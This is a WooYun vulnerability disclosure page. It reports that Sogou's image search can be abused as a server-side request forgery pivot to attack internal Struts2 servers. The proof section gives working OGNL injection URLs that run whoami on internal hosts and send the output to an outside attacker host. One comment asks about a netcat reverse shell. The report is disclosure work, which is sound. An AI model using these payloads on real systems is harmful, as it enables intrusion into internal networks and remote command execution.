当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041495

漏洞标题:通过搜狗某搜索功能扫描搜狗内网(续)之攻击内网struts2漏洞主机

相关厂商:搜狗

漏洞作者: lupin

提交时间:2013-10-30 18:05

修复时间:2013-12-14 18:05

公开时间:2013-12-14 18:05

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-30: 细节已通知厂商并且等待厂商处理中
2013-11-01: 厂商已经确认,细节仅向厂商公开
2013-11-11: 细节向核心白帽子及相关领域专家公开
2013-11-21: 细节向普通白帽子公开
2013-12-01: 细节向实习白帽子公开
2013-12-14: 细节向公众公开

简要描述:

通过搜狗正常对外搜索服务,攻击搜狗内网存在struts2漏洞的服务器。

详细说明:

几天发布了搜狗的这个漏洞: WooYun: 通过搜狗某搜索功能扫描搜狗内网
通过搜索图片功能可以访问到内网服务器,这次利用这个漏洞作为跳板攻击到了搜狗内部存在struts2漏洞的服务器。

漏洞证明:

在上次提到的漏洞中( WooYun: 通过搜狗某搜索功能扫描搜狗内网 ),使用图片搜索功能成功判断到了搜狗内部服务器的开放情况,搜集到了大量的服务器ip:

sg4.jpg


本来觉得除了扫描开放的服务器之外这个应该没有什么其他的利用价值了,不过仔细思考了一番,既然可以通过这个功能访问内网web服务器,那么如果发送一个代用攻击指令的url到了特定的内网服务器上,这个服务器恰好有漏洞,那么是不是就可以用这个搜索功能作为跳板攻击到搜狗内网了呢?
那么什么url具有攻击性呢?这里只能提交url,也就是说只能是get请求,于是我想到了前段时间闹得很凶的struts2命令执行漏洞,于是构造下面这样的url:
http://pic.sogou.com/ris?query=http%3A%2F%2F192.168.x.x%3A80%2Findex.action%3Fredirect%3A%24%7Bnew%2520java.net.URL%28%27http%3A%2F%2F1.1.1.1%3A80%2Fo.jsp%3F192.168.x.x%27%29.openConnection%28%29.getInputStream%28%29%7D
解释一下,因为服务器在内网,而且又是通过这个搜索功能作为跳板,那么我就无法直接看到命令是否执行所以,通过java构造一个http请求,让他把信息get到我远程的jsp文件上去(http://1.1.1.1/o.jsp),返回的信息就是内网服务器的ip地址。
还是用程序跑:

sg.jpg


尝试了login.action、index.action,跑了半天没结果,后来想了一下,struts2官网提供过几个示例程序,很多开发人员都把他们部署在服务器上做参考,其中最简单的一个叫struts-blank,就是一个struts2框架的helloworld,于是构造类似这样的url,再跑一次:
http://pic.sogou.com/ris?query=http%3A%2F%2F192.168.x.x%3A8080%2Fstruts2-blank%2Findex.action%3Fredirect%3A%24%7Bnew%2520java.net.URL%28%27http%3A%2F%2F1.1.1.1%3A80%2Fo.jsp%3F192.168.x.x%27%29.openConnection%28%29.getInputStream%28%29%7D
这次太幸运了,远程的o.jsp成功获得了一个ip地址:

sg1.jpg


接下来的事情就是针对这个ip构造执行命令的poc了,url如下:
http://pic.sogou.com/ris?query=http%3A%2F%2F192.168.x.x%3A8080%2Fstruts2-blank%2Findex.action%3Fredirect%3A%24%7Bnew%2520java.net.URL%28%27http%3A%2F%2F1.1.1.1%3A80%2Fo.jsp%3F%27%252Bnew+java.io.BufferedReader%28new+java.io.InputStreamReader%28new+java.lang.ProcessBuilder%28%7B%27whoami%27%7D%29.start%28%29.getInputStream%28%29%29%29.readLine%28%29%29.openConnection%28%29.getInputStream%28%29%7D
就是通过struts2漏洞执行whoami命令,结果o.jsp上收到了命令执行结果:

sg2.jpg


执行pwd:

sg3.jpg


如果再变换一些action名称的话,估计还能找到一些存在漏洞的服务器,这里就不搞了,申请奖品啊。

修复方案:

赶紧把图片搜索功能做好访问控制吧,并且内网服务器里面的struts2漏洞也不是说外部利用不到,赶紧升级吧。

版权声明:转载请注明来源 lupin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-11-01 10:52

厂商回复:

感谢提供

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-30 18:12 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    刮目相看了!

  2. 2013-10-30 18:13 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    跟随撸主的脚本,,,脚步

  3. 2013-10-30 18:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    士别三日啊

  4. 2013-10-30 18:28 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @xsser 还记得你在zone提过的想法,现在就有人实现了!

  5. 2013-10-30 19:13 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    狂拽炫酷吊炸天

  6. 2013-10-30 19:34 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @Mas @梧桐雨 @一只猿 @疯狗 @xsser 看了楼主的ID,我觉得是卤拼的意思,哎,又想吃卤肉了,真饿。

  7. 2013-10-30 19:35 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @小胖子 小胖子 你是和我一样的 90KG的屌丝IT男吗? 一起减肥有兴趣吗?

  8. 2013-10-30 19:48 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @Mas 70KG,不屌丝,不IT。

  9. 2013-10-30 21:30 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @Mas @小胖子 妇科医生你不懂?

  10. 2013-10-30 21:50 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @zzR @小胖子 狂拽炫酷吊炸天

  11. 2013-10-30 22:08 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    标题信息量略大。。

  12. 2013-10-30 23:30 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我去,好给力啊看起来

  13. 2013-10-31 08:24 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    无意中发现楼上好几个吃货。。。我会不会被灭口呢?

  14. 2013-10-31 08:28 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @鬼魅羊羔 一起减肥吗???

  15. 2013-10-31 09:34 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @Mas 他?瘦的跟杆儿似的

  16. 2013-10-31 10:22 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @Coody @Coody 。。看来只有我是胖屌丝

  17. 2013-10-31 10:28 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @Mas 错、你不胖也是个屌丝,哈哈(羊羔让我说的:P)

  18. 2013-10-31 14:12 | 雷锋小号 ( 路人 | 还没有发布任何漏洞 | 乌云现在就缺我这种默默顶贴从来不求脸熟的...)

    低调奢华有内涵。已火

  19. 2013-10-31 14:47 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    猜测DZ思路,struts没猜出来,猜出3个SQL注入和好几个POST注入。。- -||

  20. 2013-10-31 15:32 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    结果是误报,蛋疼啊,我的一上午时间就这样浪费鸟。。。

  21. 2013-11-01 13:01 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    我大概猜到是哪了

  22. 2013-11-05 12:06 | darksn0w ( 实习白帽子 | Rank:62 漏洞数:10 | 无折腾,不生活!)

    @Mas 求一起减肥

  23. 2013-11-05 12:36 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @darksn0w 请加我QQ50487391

  24. 2013-11-15 14:01 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    momo关注

  25. 2013-11-22 19:02 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我去,这太他妈牛逼了!

  26. 2013-11-22 19:04 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    只给10,洞主你好亏啊。为什么不NC反弹?

  27. 2013-11-24 15:33 | txcbg ( 普通白帽子 | Rank:391 漏洞数:53 | 说点什么呢?)

    思路很赞啊

  28. 2013-11-25 11:26 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    好厉害

  29. 2013-12-02 11:00 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @wefgod 漏洞作者应该只是做个简单的漏洞证明就好了:)

  30. 2013-12-02 11:18 | lupin ( 普通白帽子 | Rank:254 漏洞数:48 | 尊重自己的爱好 远离利益的罪恶)

    @疯狗 那天晚了就没深入搞 第二天人家修复了 我就没法深入搞了。。。

  31. 2013-12-03 09:45 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @疯狗 理解理解。说的也是,厂商承认了就没有问题了

  32. 2013-12-04 09:06 | 暴暴 ( 路人 | Rank:9 漏洞数:2 | 呃。。。)

    。。太NB了。。

  33. 2013-12-14 22:30 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    这样的漏洞值得精华,赞楼主

  34. 2013-12-14 23:00 | lupin ( 普通白帽子 | Rank:254 漏洞数:48 | 尊重自己的爱好 远离利益的罪恶)

    @hacker@sina.cn 那你给个好评啊 呵呵

  35. 2013-12-14 23:31 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    @lupin 已送,对于精彩的帖子 毫不吝惜.

  36. 2013-12-21 10:19 | Stream ( 路人 | Rank:6 漏洞数:2 | 低头要有勇气,抬头要有底气!)

    这个NB